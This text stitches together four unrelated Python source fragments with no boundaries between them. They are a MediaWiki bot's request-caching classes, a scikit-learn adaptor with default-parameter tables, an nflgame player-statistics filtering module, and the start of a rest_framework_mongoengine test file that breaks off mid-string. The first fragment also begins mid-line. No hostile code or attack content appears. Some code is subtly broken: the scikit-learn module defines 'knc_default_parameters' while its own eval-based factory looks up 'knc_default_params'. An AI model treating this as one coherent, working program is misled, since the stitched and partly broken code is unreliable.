in result['query'].get('pages', []): title = page_info['title'] page = self.cache._page_object(wiki, title) wiki.session.add(page) if 'missing' in page_info: page.last_revision = 0 page.revision = 0 page.contents = None else: revid = page_info['revisions'][0]['revid'] # revid = page_info['lastrevid'] # for the modern MW page.last_revision = revid for p in self._all_finished_requests(all_requests, title): p.result.set(page_info) wiki.session.commit() class PageRequest(Request): def __init__(self, cache, title): super(PageRequest, self).__init__(cache) self.title = title @property def group_key(self): return (PageRequest,) @property def key(self): return self.title def run(self, all_requests): wiki = self.cache.get_wiki() titles = all_requests[self.group_key].keys() dump = self.cache._apirequest_raw(action='query', export='1', exportnowrap='1', titles='|'.join(titles)).raw tree = ElementTree.parse(dump) for elem in tree.getroot(): tag = elem.tag if tag.endswith('}siteinfo'): continue elif tag.endswith('}page'): revision, = (e for e in elem if e.tag.endswith('}revision')) pagename, = (e for e in elem if e.tag.endswith('}title')) text, = (e for e in revision if e.tag.endswith('}text')) revid, = (e for e in revision if e.tag.endswith('}id')) title = pagename.text page = self.cache._page_object(wiki, title) page.last_revision = int(revid.text) page.revision = int(revid.text) page.contents = text.text wiki.session.add(page) for p in self._all_finished_requests(all_requests, title): p.result.set() else: raise ValueError(tag) wiki.session.commit() class SingleRequest(Request): """A request that can't be combined with others A SingleRequest is run as soon as it's picked up from the request queue. 
""" limit = 1 def insert_into(self, all_requests): self.run(all_requests) class EditRequest(SingleRequest): def __init__(self, cache, pageproxy): super(EditRequest, self).__init__(cache) self.pageproxy = pageproxy self.title = pageproxy.title self.edittoken = pageproxy.page_info['edittoken'] self.starttimestamp = pageproxy.page_info['starttimestamp'] def run(self, all_requests): pageproxy = self.pageproxy edits = pageproxy.edits if not edits: return revid = None wiki = self.cache.get_wiki() page = self.cache._page_object(wiki, self.title) page.last_revision = None wiki.session.commit() whole_page_edit = edits.pop(None) if (whole_page_edit is not None and (pageproxy.contents is None or whole_page_edit != pageproxy.contents)): self.do_edit(None, whole_page_edit) for section, text in edits.items(): self.do_edit(section, text) self.result.set() def do_edit(self, section, text): kwargs = dict( action='edit', title=self.title, text=text, token=self.edittoken, summary='gwikibot edit', # TODO minor=False, # TODO bot=True, # TODO starttimestamp=self.starttimestamp, # TODO: recreate, createonly, nocreate ) if section is not None: kwargs['section'] = section result = self.cache.apirequest(**kwargs) revid = result['edit']['newrevid'] self.starttimestamp = result['edit']['newtimestamp']
"""Integrating sklearn in our clumsy framework, the clumsy way. How to add a new model: - Identify SKLearn class - Add it to the Scikit2Short dictionary - Create a shortName_default_params() and a shortName_nonid_params() method To instantiate: sk_factory(skclass) or sk_factory(shortName) """ #TODO GLMnet #TODO: SS, NaiveBayes, LDA/QDA from collections import OrderedDict from sklearn.base import BaseEstimator from oscail.common.config import Configurable, Configuration from rdkit.ML.NaiveBayes.ClassificationModel import NaiveBayesClassifier from sklearn.ensemble import GradientBoostingClassifier, GradientBoostingRegressor, RandomForestRegressor, \ ExtraTreesClassifier, ExtraTreesRegressor from sklearn.ensemble.forest import RandomForestClassifier import numpy as np from sklearn.gaussian_process.gaussian_process import MACHINE_EPSILON from sklearn.linear_model.ridge import Ridge from sklearn.linear_model import Lasso, ElasticNet, Lars, OrthogonalMatchingPursuit, BayesianRidge, \ ARDRegression, LogisticRegression, SGDClassifier, SGDRegressor, Perceptron, LassoLars, LinearRegression from sklearn.naive_bayes import GaussianNB from sklearn.svm import SVC, NuSVC, LinearSVC, SVR, NuSVR from sklearn.neighbors import KNeighborsClassifier, RadiusNeighborsClassifier, \ KNeighborsRegressor, RadiusNeighborsRegressor, NearestCentroid from sklearn.gaussian_process import GaussianProcess from sklearn.cross_decomposition import PLSRegression, PLSCanonical, CCA, PLSSVD from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor Scikit2Short = { #Ensembles RandomForestClassifier: 'rfc', RandomForestRegressor: 'rfr', GradientBoostingClassifier: 'gbc', GradientBoostingRegressor: 'gbr', ExtraTreesClassifier: 'etc', ExtraTreesRegressor: 'etr', #NaiveBayes NaiveBayesClassifier: 'nb', # TODO: parameters GaussianNB: 'gnb', #GLMs Ridge: 'ridge', Lasso: 'lasso', ElasticNet: 'elnet', Lars: 'lars', OrthogonalMatchingPursuit: 'omp', BayesianRidge: 'bayridge', ARDRegression: 'ardr', 
LogisticRegression: 'logreg', SGDClassifier: 'sgdc', SGDRegressor: 'sgdr', Perceptron: 'perceptron', LassoLars: 'lassolars', LinearRegression: 'lr', #Support Vector Machines SVC: 'svc', NuSVC: 'nusvc', LinearSVC: 'linsvc', SVR: 'svr', NuSVR: 'nusvr', #NearestNeighbours KNeighborsClassifier: 'knc', RadiusNeighborsClassifier: 'rnc', KNeighborsRegressor: 'knr', RadiusNeighborsRegressor: 'rnr', NearestCentroid: 'nc', #Gaussian Processes GaussianProcess: 'gp', #Partial Least Squares PLSRegression: 'plsr', PLSCanonical: 'plscan', CCA: 'cca', PLSSVD: 'plssvd', #Decision Trees DecisionTreeClassifier: 'dtc', DecisionTreeRegressor: 'dtr' } Short2Scikit = dict((v, k) for k, v in Scikit2Short.iteritems()) class ScikitAdaptor(BaseEstimator, Configurable): def __init__(self, skclassifier=RandomForestClassifier(random_state=0), configuration_dict=None, non_id_params=(), short_name=None, **kwargs): super(ScikitAdaptor, self).__init__() self.classifier = skclassifier self.configuration_dict = configuration_dict if configuration_dict else skclassifier.get_params() self.non_id_params = non_id_params self.short_name = short_name if short_name else \ Scikit2Short.get(self.classifier.__class__, self.classifier.__class__.__name__) def configuration(self): return Configuration(name=self.short_name, configuration_dict=self.configuration_dict, non_id_keys=self.non_id_params) def fit(self, X, y): return self.train(X, y) def train(self, X, y): classifier = self.classifier.fit(X, y) if not classifier: classifier = self.classifier self.classifier = classifier return self def score(self, X): return self.scores(X)[:, 1] def scores(self, X): try: scores = self.classifier.predict_proba(X) # TODO: some have methods with further refinements, # like allowing to use a subset of classifiers in ensembles except: # (AttributeError, TypeError) scores = self.classifier.predict(X) if scores.ndim < 2: scores2 = np.zeros((len(scores) if isinstance(scores, np.ndarray) else 1, 2)) # FIXME: isinstance is slow 
scores2[:, 1] = scores # ATM, target class = 1 return scores2 return scores def predict_proba(self, X): return self.scores(X) def get_skl_default_params(short_name): return eval('%s_default_params()' % short_name) def sk_wrapper(skclass, configuration_dict=None, non_ids=None): if isinstance(skclass, str): skclass = Short2Scikit[skclass] short_name = Scikit2Short[skclass] if not configuration_dict: configuration_dict = eval('%s_default_params()' % short_name) if not non_ids: non_ids = eval('%s_nonid_params()' % short_name) return skclass(**configuration_dict), configuration_dict, non_ids, short_name def skl_factory(skclass, configuration_dict=None): return ScikitAdaptor(*sk_wrapper(skclass, configuration_dict=configuration_dict)) ########################## #Configuration (ID stuff) #We usually avoid introspection to get finer control on the parameters order and defaults ########################## ######RandomForests def rfc_default_params(): return OrderedDict(( ('n_estimators', 10), ('criterion', 'gini'), ('max_depth', None), ('min_samples_split', 1), ('min_samples_leaf', 1), ('min_density', 0.1), ('max_features', 'auto'), ('bootstrap', True), ('compute_importances', False), ('oob_score', False), ('n_jobs', 1), ('random_state', 0), ('verbose', 0))) def rfc_nonid_params(): return 'verbose', 'n_jobs' # OOB, importances change the internal representation of the classifier def rfr_default_params(): params = rfc_default_params() params['criterion'] = 'mse' return params def rfr_nonid_params(): return rfc_nonid_params() ######GradientBoosting def gbc_default_params(): return OrderedDict(( ('learn_rate', 0.1), ('loss', 'deviance'), # Or 'ls' or 'lad' for regression ('subsample', 1.0), ('n_estimators', 100), #DecisionTree params ('min_samples_split', 1), ('min_samples_leaf', 1), ('max_depth', 3), #Rng ('random_state', 0))) def gbc_nonid_params(): return () def gbr_default_params(): params = gbc_default_params() params['loss'] = 'ls' return params def gbr_nonid_params(): 
return () ######Extremely Randomized Trees Classifier def etc_default_params(): return OrderedDict(( ('n_estimators', 10), ('criterion', 'gini'), # or 'entropy' ('max_depth', None), ('min_samples_split', 1), ('min_samples_leaf', 1), ('min_density', 0.1), ('max_features', 'auto'), # or 'sqrt' or 'log2' or 'none' ('bootstrap', False), # whether bootstrap samples are used when building trees ('compute_importances', True), ('oob_score', False), # whether to use out-of-bag samples to estimate the generalization error ('n_jobs', 1), ('random_state', 0), ('verbose', 0) )) def etc_nonid_params(): return 'n_jobs', 'verbose' # 'compute_importances' ######Extremely Randomized Trees Regressor def etr_default_params(): return OrderedDict(( ('n_estimators', 10), ('criterion', 'mse'), ('max_depth', None), ('min_samples_split', 1), ('min_samples_leaf', 1), ('min_density', 0.1), ('max_features', 'auto'), ('bootstrap', False), ('compute_importances', True), ('oob_score', False), ('n_jobs', 1), ('random_state', None), ('verbose', 0) )) def etr_nonid_params(): return 'compute_importances', 'n_jobs', 'verbose' ############################### # Generalized Linear Models ############################### # TODO: glmnet (e.g. in MDP) ############################### ######Ridge def ridge_default_params(): return OrderedDict(( ('alpha', 1.0), ('fit_intercept', True), ('normalize', False), ('copy_X', True), ('tol', 1e-3) )) def ridge_nonid_params(): return 'copy_X' ######Lasso def lasso_default_params(): return OrderedDict(( ('alpha', 1.0), ('fit_intercept', True), ('normalize', False), ('precompute', 'auto'), ('copy_X', True), ('max_iter', 1000), ('tol', 1e-4), ('warm_start', False), ('positive', False) )) def lasso_nonid_params(): return 'copy_X' ######ElasticNet def elnet_default_params(): return OrderedDict(( ('alpha', 1.0), # constant that multiplies the penalty term ('rho', 0.5), # For rho = 0 the penalty is an L1 penalty. For rho = 1 it is an L2 penalty. 
# For 0 < rho < 1, the penalty is a combination of L1 and L2 ('fit_intercept', True), ('normalize', False), ('precompute', 'auto'), ('max_iter', 1000), ('copy_X', True), ('tol', 1e-4), ('warm_start', False), ('positive', False) )) def elnet_nonid_params(): return 'copy_X' ######LeastAngleRegression #TODO check Lasso_path def lars_default_params(): return OrderedDict(( ('n_nonzero_coefs', 500), ('fit_intercept', True), ('verbose', False), ('normalize', True), ('precompute', 'auto'), ('copy_X', True), ('eps', np.finfo(np.float).eps) # The machine-precision regularization in the computation of the # Cholesky diagonal factors. )) def lars_nonid_params(): return 'verbose', 'copy_X' ######OrthogonalMatchingPursuit def omp_default_params(): return OrderedDict(( ('n_nonzero_coefs', None), ('tol', None), ('fit_intercept', True), ('normalize', True), ('precompute_gram', False), ('copy_X', True), ('copy_Gram', True), ('copy_Xy', True) )) def omp_nonid_params(): return 'copy_X', 'copy_Xy', 'copy_Gram' ######BayesianRidge regression def bayridge_default_params(): return OrderedDict(( ('n_iter', 300), ('tol', 1.e-3), ('alpha_1', 1e-6), # shape parameter for the Gamma distribution prior over the alpha parameter. 
('alpha_2', 1e-6), # inverse scale parameter (rate parameter) for the Gamma distribution prior # over the alpha parameter ('lambda_1', 1e-6), # shape parameter for the Gamma distribution prior over the lambda parameter ('lambda_2', 1e-6), # inverse scale parameter (rate parameter) for the Gamma distribution prior # over the lambda parameter ('compute_score', False), ('fit_intercept', True), ('normalize', False), ('copy_X', True), ('verbose', False) )) def bayridge_nonid_params(): return 'copy_X', 'verbose' ######ARDRegression def ardr_default_params(): return OrderedDict(( ('n_iter', 300), ('tol', 1e-3), ('alpha_1', 1e-6), ('alpha_2', 1e-6), ('lambda_1', 1e-6), ('lambda_2', 1e-6), ('compute_score', False), ('threshold_lambda', 1e+4), ('fit_intercept', True), ('normalize', False), ('copy_X', True), ('verbose', False) )) def ardr_nonid_params(): return 'copy_X', 'verbose' ######LogisticRegression def logreg_default_params(): return OrderedDict(( ('penalty', 'l2'), ('dual', False), ('tol', 1e-4), ('C', 1.0), # Specifies the strength of the regularization. The smaller it is the bigger in the regularization. # If None then C is set to n_samples. ('fit_intercept', True), ('intercept_scaling', 1), ('class_weight', None), ('random_state', 0), )) def logreg_nonid_params(): return () ######SGDRegression def sgdr_default_params(): return OrderedDict(( ('loss', 'squared_loss'), ('penalty', 'l2'), ('alpha', 0.0001), # Constant that multiplies the regularization term ('rho', 0.85), # The Elastic Net mixing parameter, with 0 < rho <= 1. 
('fit_intercept', True), ('n_iter', 5), ('shuffle', False), # Whether or not the training data should be shuffled after each epoch ('verbose', 0), ('p', 0.1), # Epsilon in the epsilon-insensitive huber loss function ('seed', 0), # seed to use when shuffling the data ('learning_rate', 'invscaling'), ('eta0', 0.01), # initial learning rate ('power_t', 0.25), # The exponent for inverse scaling learning rate ('warm_start', False), )) def sgdr_nonid_params(): return 'verbose' ######SGDClassification def sgdc_default_params(): return OrderedDict(( ('loss', 'hinge'), ('penalty', 'l2'), ('alpha', 0.0001), ('rho', 0.85), ('fit_intercept', True), ('n_iter', 5), ('shuffle', False), ('verbose', 0), ('n_jobs', 1), ('seed', 0), ('learning_rate', 'optimal'), ('eta0', 0.0), ('power_t', 0.5), ('class_weight', None), ('warm_start', False) )) def sgdc_nonid_params(): return 'verbose', 'n_jobs' ######Perceptron def perceptron_default_params(): return OrderedDict(( ('penalty', None), ('alpha', 0.0001), ('fit_intercept', True), ('n_iter', 5), ('shuffle', False), ('verbose', 0), ('eta0', 1.0), ('n_jobs', 1), ('seed', 0), ('class_weight', None), ('warm_start', False) )) def perceptron_nonid_params(): return 'verbose', 'n_jobs' ######LassoLars def lassolars_default_params(): return OrderedDict(( ('alpha', 1.0), ('fit_intercept', True), ('verbose', False), ('normalize', True), ('precompute', 'auto'), ('max_iter', 500), ('eps', np.finfo(np.float).eps), ('copy_X', True) )) def lassolars_nonid_params(): return 'verbose', 'copy_X' ######LinearRegression def lr_default_params(): return OrderedDict(( ('fit_intercept', True), ('normalize', False), ('copy_X', True) )) def lr_nonid_params(): return 'copy_X' ############################### # Support Vector Marchines ############################### ######SVC def svc_default_params(): return OrderedDict(( ('C', None), ('kernel', 'rbf'), # It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' ('degree', 3.0), # Only significant if 
polykernel or sigmoid kernel are used ('gamma', 0.0), # Kernel coefficient for 'rbf' and 'poly'. # If gamma is 0.0 then 1/n_features will be used instead ('coef0', 0.0), # Only significant if polykernel or sigmoid kernel are used ('probability', False), ('shrinking', True), ('tol', 1e-3), ('cache_size', 200), ('class_weight', None), # Set the parameter C of class i to class_weight[i]*C. If not given, all classes are # supposed to have weight=1. The 'auto' mode uses the values of y to automatically # adjust weights inversely proportional to class frequencies. ('verbose', False) )) def svc_nonid_params(): return 'cache_size', 'verbose' ######NuSVC def nusvc_default_params(): return OrderedDict(( ('nu', 0.5), # in [0,1]. An upper bound on the fraction of training errors and a lower bound of the fraction # of support vectors. ('kernel', 'rbf'), ('degree', 3), ('gamma', 0.0), ('coef0', 0.0), ('probability', False), ('shrinking', True), ('tol', 1e-3), ('cache_size', 200), ('class_weight', None), ('verbose', False) )) def nusvc_nonid_params(): return 'cache_size', 'verbose' ######LinearSVC def linsvc_default_params(): return OrderedDict(( ('C', 1.0), # Penalty parameter C of the error term. If None then C is set to n_samples (does not wort atm). ('loss', 'l2'), ('penalty', 'l2'), ('dual', True), ('tol', 1e-4), ('multi_class', 'ovr'), # Determines the multi-class strategy if `y` contains more than two classes. ('fit_intercept', True), ('intercept_scaling', 1.0), ('class_weight', None), ('verbose', 0.0) )) def linsvc_nonid_params(): return 'verbose' ######Support Vector Regression def svr_default_params(): return OrderedDict(( ('C', 1.0), # None does not work ('epsilon', 0.1), # It specifies the epsilon-tube within which no penalty is associated in the training loss # function with points predicted within a distance epsilon from the actual value. 
('kernel', 'rbf'), ('degree', 3), ('gamma', 0.0), ('coef0', 0.0), ('probability', False), ('shrinking', True), ('tol', 1e-3), ('cache_size', 200), ('verbose', False) )) def svr_nonid_params(): return 'cache_size', 'verbose' ######NuSVR def nusvr_default_params(): return OrderedDict(( ('C', 1), # None should work, but they have a bug ('nu', 0.5), ('kernel', 'rbf'), ('degree', 3), ('gamma', 0.0), ('coef0', 0.0), ('probability', False), ('shrinking', True), ('tol', 1e-3), ('cache_size', 200), ('verbose', False) )) def nusvr_nonid_params(): return 'cache_size', 'verbose' ############################### # NearestNeigbours ############################### ######K Nearest Neighbours def knc_default_parameters(): return OrderedDict(( ('n_neighbors', 5), ('weights', 'uniform'), ('algorithm', 'auto'), # Can bee 'kd_tree', 'ball_tree', 'brute' or 'auto' ('leaf_size', 30), # only for kd-tree and ball_tree algorithms ('warn_on_equidistant', True), ('p', 2) # Parameter for the Minkowski metric. P=2 -> euclidian distance )) def knc_nonid_params(): return 'warn_on_equidistant' ######Radius Neighbours def rnc_default_params(): return OrderedDict(( ('radius', 1.0), ('weights', 'uniform'), ('algorithm', 'auto'), ('leaf_size', 30), ('p', 2), ('outlier_label', None) # Label, which is given for outlier samples (samples with no neighbors on given radius) # If set to None, ValueError is raised, when outlier is detected. 
)) def rnc_nonid_params(): return 'outlier_label' # WARNING: not sure about it --> check ######K Nearest Neighbours Regressor def knr_default_params(): return OrderedDict(( ('n_neighbors', 5), ('weights', 'uniform'), ('algorithm', 'auto'), ('leaf_size', 30), ('warn_on_equidistant', True), ('p', 2) )) def knr_nonid_params(): return 'warn_on_equidistant' ######Radius Neighbours Regressor def rnr_default_params(): return OrderedDict(( ('radius', 1.0), ('weights', 'uniform'), ('algorithm', 'auto'), ('leaf_size', 30), ('p', 2), )) def rnr_nonid_params(): return () ######Nearest Centroid def nc_default_params(): return OrderedDict(( ('metric', 'euclidean'), ('shrink_threshold', None) # Threshold for shrinking centroids to remove feature )) def nc_nonid_params(): return () ############################### # GaussianProcesses ############################### ######Gaussian Process def gp_default_params(): return OrderedDict(( ('regr', 'constant'), # A regression function returning an array of outputs of the linear regression # functional basis. Among 'constant', 'linear', 'quadratic'. ('corr', 'squared_exponential'), # A stationary autocorrelation function returning the autocorrelation between # two points x and x'. Can be 'absolute_exponential', 'squared_exponential', # 'generalized_exponential', 'cubic' or 'linear' ('beta0', None), ('storage_mode', 'full'), # A string specifying whether the Cholesky decomposition of the correlation matrix # should be stored in the class ('verbose', False), ('theta0', 1e-1), # The parameters in the autocorrelation model. If thetaL and thetaU are also # specified, theta0 is considered as the starting point for the maximum likelihood # estimation of the best set of parameters. ('thetaL', None), # Lower bound on the autocorrelation parameters for maximum likelihood estimation. ('thetaU', None), # Upper bound on the autocorrelation parameters for maximum likelihood estimation. ('normalize', True), ('nugget', 10. 
* MACHINE_EPSILON), # Introduce a nugget effect to allow smooth predictions from noisy data. ('optimizer', 'fmin_cobyla'), ('random_start', 1), # The number of times the Maximum Likelihood Estimation should be performed from a # random starting point. ('random_state', 0) # The generator used to shuffle the sequence of coordinates of theta in the Welch # optimizer. If an integer is given, it fixes the seed. )) def gp_nonid_params(): return 'storage_mode', 'verbose' ############################### # Partial Least Squares ############################### ######PLSRegression def plsr_default_params(): return OrderedDict(( ('n_components', 2), ('scale', True), ('max_iter', 500), ('tol', 1e-6), ('copy', True) )) def plsr_nonid_params(): return 'copy' ######PLSCanonical def plscan_default_params(): return OrderedDict(( ('n_components', 2), ('scale', True), ('algorithm', 'nipals'), # The algorithm used to estimate the weights. "nipals" or "svd" ('max_iter', 500), ('tol', 1e-6), ('copy', True) )) def plscan_nonid_params(): return 'copy' ######CCA def cca_default_params(): return OrderedDict(( ('n_components', 2), ('scale', True), ('max_iter', 500), ('tol', 1e-6), ('copy', True) )) def cca_nonid_params(): return 'copy' ######PLSSVD def plssvd_default_params(): return OrderedDict(( ('n_components', 2), ('scale', True) )) def plssvd_nonid_params(): return () ############################### # Decision Trees ############################### ######Decision Tree Classifier def dtc_default_params(): return OrderedDict(( ('criterion', 'gini'), # or 'entropy' ('max_depth', None), ('min_samples_split', 1), ('min_samples_leaf', 1), ('min_density', 0.1), # This parameter controls a trade-off in an optimization heuristic. # It controls the minimum density of the `sample_mask` ('max_features', None), # The number of features to consider when looking for the best split. 
('compute_importances', False), ('random_state', 0) )) def dtc_nonid_params(): return () # 'compute_importances' ######Decision Tree Regressor def dtr_default_params(): return OrderedDict(( ('criterion', 'mse'), ('max_depth', None), ('min_samples_split', 1), ('min_samples_leaf', 1), ('min_density', 0.1), ('max_features', None), ('compute_importances', False), ('random_state', 0) )) def dtr_nonid_params(): return () # 'compute_importances' ######Naive Bayes def gnb_default_params(): return OrderedDict() def gnb_nonid_params(): return () # 'compute_importances' if __name__ == '__main__': print 'Done'
import functools
import itertools
import operator

from nflgame import OrderedDict
from nflgame import statmap

_BUILTIN_PREDS = {
    '__lt': operator.lt,
    '__le': operator.le,
    '__ne': operator.ne,
    '__ge': operator.ge,
    '__gt': operator.gt,
}
"""
A dictionary of suffixes to predicates that can be used in Gen.filter.
The suffix corresponds to what to add to the end of a field name to
invoke the predicate it corresponds to. For example, this::

    players.filter(receiving_rec=lambda v: v > 0)

Is equivalent to::

    players.filter(receiving_rec__gt=0)

(Django users should feel right at home.)
"""


class Gen (object):
    """
    Players implements a sequence type and provides a convenient API for
    searching sets of players.
    """

    def __init__(self, iterable):
        """
        Creates a new Players sequence from an iterable where each element
        of the iterable is an instance of the Player class.
        """
        self.__iter = iterable

    def filter(self, **kwargs):
        """
        filters the sequence based on a set of criteria. Parameter names
        should be equivalent to the properties accessible in the items of
        the sequence. For example, where the items are instances of
        the Stats class::

            players.filter(home=True, passing_tds=1,
                           rushing_yds=lambda x: x > 0)

        Returns a sequence with only players on the home team that have a
        single passing touchdown and more than zero rushing yards.

        If a field specified does not exist for a particular item, that
        item is excluded from the result set.

        If a field is set to a value, then only items with fields that
        equal that value are returned. If a field is set to a callable
        predicate, then only items with field values satisfying that
        predicate will be returned.

        Also, special suffixes that begin with '__' may be added to the
        end of a field name to invoke built in predicates (gt, le, lt,
        ne, ge, ...). For example::

            players.filter(receiving_rec__gt=0)

        (Django users should feel right at home.)
        """
        preds = []
        for k, v in kwargs.items():
            def pred(field, value, item):
                # Built-in comparison suffixes take precedence, e.g.
                # 'passing_yds__gt' compares the 'passing_yds' field.
                for suffix, p in _BUILTIN_PREDS.items():
                    if field.endswith(suffix):
                        # Fix: strip exactly the trailing suffix. The old
                        # code used field.index(suffix), which truncates at
                        # the *first* occurrence of the substring and
                        # mangles field names containing it earlier.
                        f = field[:-len(suffix)]
                        if not hasattr(item, f) or getattr(item, f) is None:
                            return False
                        return p(getattr(item, f), value)
                if not hasattr(item, field) or getattr(item, field) is None:
                    return False
                # Fix: accept *any* callable predicate (bound methods,
                # functools.partial objects, callable instances) instead of
                # only objects of the exact `function` type.
                if callable(value):
                    return value(getattr(item, field))
                return getattr(item, field) == value
            # Bind the current field/value now; a bare closure would
            # late-bind and every predicate would see the last (k, v).
            preds.append(functools.partial(pred, k, v))

        gen = filter(lambda item: all(f(item) for f in preds), self)
        return self.__class__(gen)

    def limit(self, n):
        """
        Limit the sequence to N items.
        """
        return self.__class__(itertools.islice(self, n))

    def sort(self, field, descending=True):
        """
        sorts the sequence according to the field specified---where field
        is a property on an item in the sequence. If descending is false,
        items will be sorted in order from least to greatest.

        Items that do not have the given field sort as if its value
        were 0.
        """
        def attrget(item):
            return getattr(item, field, 0)

        return self.__class__(sorted(self, reverse=descending, key=attrget))

    def __str__(self):
        """Returns a list of items in the sequence."""
        return '[%s]' % ', '.join([str(item) for item in self])

    def __iter__(self):
        """Make this an iterable sequence."""
        if self.__iter is None:
            return iter([])
        if isinstance(self.__iter, OrderedDict):
            return iter(self.__iter.values())
        return iter(self.__iter)

    def __reversed__(self):
        """Satisfy the built in reversed."""
        return reversed(self.__iter)


class GenDrives (Gen):
    """
    GenDrives implements a sequence type and provides a convenient API
    for searching drives.
    """

    def plays(self):
        """
        Returns all of the plays, in order, belonging to every drive in
        the sequence.
        """
        # chain.from_iterable stays lazy; chain(*[...]) forced a full list.
        return GenPlays(itertools.chain.from_iterable(d.plays for d in self))

    def players(self):
        """
        Returns the combined player stats for every player that
        participated in any of the drives in the sequence.
        """
        return self.plays().players()

    def number(self, n, team=None):
        """
        Gets the Nth drive where the first drive corresponds to n=1. This
        is only useful given a complete collection of drives for an
        entire game.

        If the team parameter is specified (i.e., team='NE'), then n will
        be interpreted as *that* team's Nth drive.
        """
        # NOTE: asserts are kept for API compatibility with existing
        # callers; they vanish under `python -O`.
        assert n > 0
        n -= 1
        if team is None:
            return list(self)[n]
        else:
            i = 0
            for d in self:
                if d.team == team:
                    if i == n:
                        return d
                    i += 1
            assert False, \
                'Could not find drive %d for team %s.' % (n + 1, team)


class GenPlays (Gen):
    """
    GenPlays implements a sequence type and provides a convenient API
    for searching plays.
    """

    def players(self):
        """
        Returns the combined player stats for every play in the sequence.
        """
        players = OrderedDict()
        for play in self:
            for player in play.players:
                if player.playerid not in players:
                    players[player.playerid] = player
                else:
                    players[player.playerid] += player
        return GenPlayerStats(players)


class GenPlayerStats (Gen):
    """
    GenPlayerStats implements a sequence type and provides a convenient
    API for searching sets of player statistics.
    """

    def name(self, name):
        """
        Returns a single player whose name equals `name`. If no such
        player can be found, None is returned.

        Note that NFL GameCenter formats their names like "T.Brady" and
        "W.Welker". Thus, `name` should also be in this format.
        """
        for p in self:
            if p.name == name:
                return p
        return None

    def playerid(self, playerid):
        """
        Returns a single player whose NFL GameCenter identifier equals
        `playerid`. This probably isn't too useful, unless you're trying
        to do ID mapping. (Players have different identifiers across
        NFL.com.)

        If no such player with the given identifier is found, None is
        returned.
        """
        for p in self:
            if p.playerid == playerid:
                return p
        return None

    def touchdowns(self):
        """
        touchdowns is a convenience method for returning a Players
        sequence of all players with at least one touchdown.
        """
        def gen():
            for p in self:
                for f in p.__dict__:
                    if f.endswith('tds') and p.__dict__[f] > 0:
                        yield p
                        break
        return self.__class__(gen())

    def __filter_category(self, cat):
        """Keeps only players that have statistics in category `cat`."""
        return self.__class__(filter(lambda p: p.has_cat(cat), self))

    def passing(self):
        """Returns players that have a "passing" statistical category."""
        return self.__filter_category('passing')

    def rushing(self):
        """Returns players that have a "rushing" statistical category."""
        return self.__filter_category('rushing')

    def receiving(self):
        """Returns players that have a "receiving" statistical category."""
        return self.__filter_category('receiving')

    def fumbles(self):
        """Returns players that have a "fumbles" statistical category."""
        return self.__filter_category('fumbles')

    def kicking(self):
        """Returns players that have a "kicking" statistical category."""
        return self.__filter_category('kicking')

    def punting(self):
        """Returns players that have a "punting" statistical category."""
        return self.__filter_category('punting')

    def kickret(self):
        """Returns players that have a "kickret" statistical category."""
        return self.__filter_category('kickret')

    def puntret(self):
        """Returns players that have a "puntret" statistical category."""
        return self.__filter_category('puntret')

    def defense(self):
        """Returns players that have a "defense" statistical category."""
        return self.__filter_category('defense')

    def penalty(self):
        """Returns players that have a "penalty" statistical category."""
        return self.__filter_category('penalty')

    def csv(self, fileName, allfields=False):
        """
        Given a file-name fileName, csv will write the contents of the
        Players sequence to fileName formatted as comma-separated values.
        The resulting file can then be opened directly with programs like
        Excel, Google Docs, Libre Office and Open Office.

        Note that since each player in a Players sequence may have
        differing statistical categories (like a quarterback and a
        receiver), the minimum constraining set of statistical categories
        is used as the header row for the resulting CSV file. This
        behavior can be changed by setting 'allfields' to True, which
        will use every available field in the header.
        """
        import csv

        # Collect the union of stat fields present across all players.
        fields, rows = set(), []
        players = list(self)
        for p in players:
            for field, stat in p.stats.items():
                fields.add(field)
        if allfields:
            for statId, info in statmap.idmap.items():
                for field in info['fields']:
                    fields.add(field)
        fields = sorted(fields)

        for p in players:
            d = {
                'name': p.name,
                'id': p.playerid,
                'home': 'yes' if p.home else 'no',
                'team': p.team,
                'pos': 'N/A',
            }
            if p.player is not None:
                d['pos'] = p.player.position
            for field in fields:
                # Missing categories are emitted as empty cells.
                d[field] = p.__dict__.get(field, "")
            rows.append(d)

        fieldNames = ["name", "id", "home", "team", "pos"] + fields
        # Prepend a header row mapping each field name to itself.
        rows = [dict((f, f) for f in fieldNames)] + rows
        # Fix: close the file deterministically (the original leaked the
        # handle returned by open()).
        with open(fileName, 'w+') as csvFile:
            csv.DictWriter(csvFile, fieldNames).writerows(rows)

    def __add__(self, other):
        """
        Adds two sequences of players by combining repeat players and
        summing their statistics.
        """
        players = OrderedDict()
        for p in itertools.chain(self, other):
            if p.playerid not in players:
                players[p.playerid] = p
            else:
                players[p.playerid] += p
        return GenPlayerStats(players)
"""Tests for embedded-document support in rest_framework_mongoengine.

Covers: serializer field mapping (repr-based), standalone embedded-document
serializers, (nested/list/generic) embedding integration against a live
mongoengine connection, and validation of embedded fields.
"""
from collections import OrderedDict

import pytest
from django.test import TestCase
from mongoengine import Document, EmbeddedDocument, fields
from rest_framework import fields as drf_fields
from rest_framework.serializers import Field, Serializer
from rest_framework_mongoengine.fields import DocumentField
from rest_framework_mongoengine.serializers import (
    DocumentSerializer,
    EmbeddedDocumentSerializer
)

from .models import DumbEmbedded, OtherEmbedded
from .utils import dedent


# --- fixture models -------------------------------------------------------

class NestedEmbeddedDoc(EmbeddedDocument):
    name = fields.StringField()
    embedded = fields.EmbeddedDocumentField(DumbEmbedded)


class SelfEmbeddingDoc(EmbeddedDocument):
    # 'self' makes the embedding recursive (used for depth-limit tests).
    name = fields.StringField()
    embedded = fields.EmbeddedDocumentField('self')


class EmbeddingDoc(Document):
    embedded = fields.EmbeddedDocumentField(DumbEmbedded)


class NestedEmbeddingDoc(Document):
    embedded = fields.EmbeddedDocumentField(NestedEmbeddedDoc)


class RequiredEmbeddingDoc(Document):
    embedded = fields.EmbeddedDocumentField(DumbEmbedded, required=True)


class ListEmbeddingDoc(Document):
    embedded_list = fields.EmbeddedDocumentListField(DumbEmbedded)


class RecursiveEmbeddingDoc(Document):
    embedded = fields.EmbeddedDocumentField(SelfEmbeddingDoc)


class GenericEmbeddingDoc(Document):
    embedded = fields.GenericEmbeddedDocumentField()


class TestEmbeddingMapping(TestCase):
    """Repr-based checks of how embedded fields map onto serializer fields."""

    # NOTE(review): method name has a typo ("embbedded"); kept as-is since
    # renaming would change the test id.
    def test_embbedded(self):
        class TestSerializer(EmbeddedDocumentSerializer):
            class Meta:
                model = DumbEmbedded
                fields = '__all__'
        expected = dedent("""
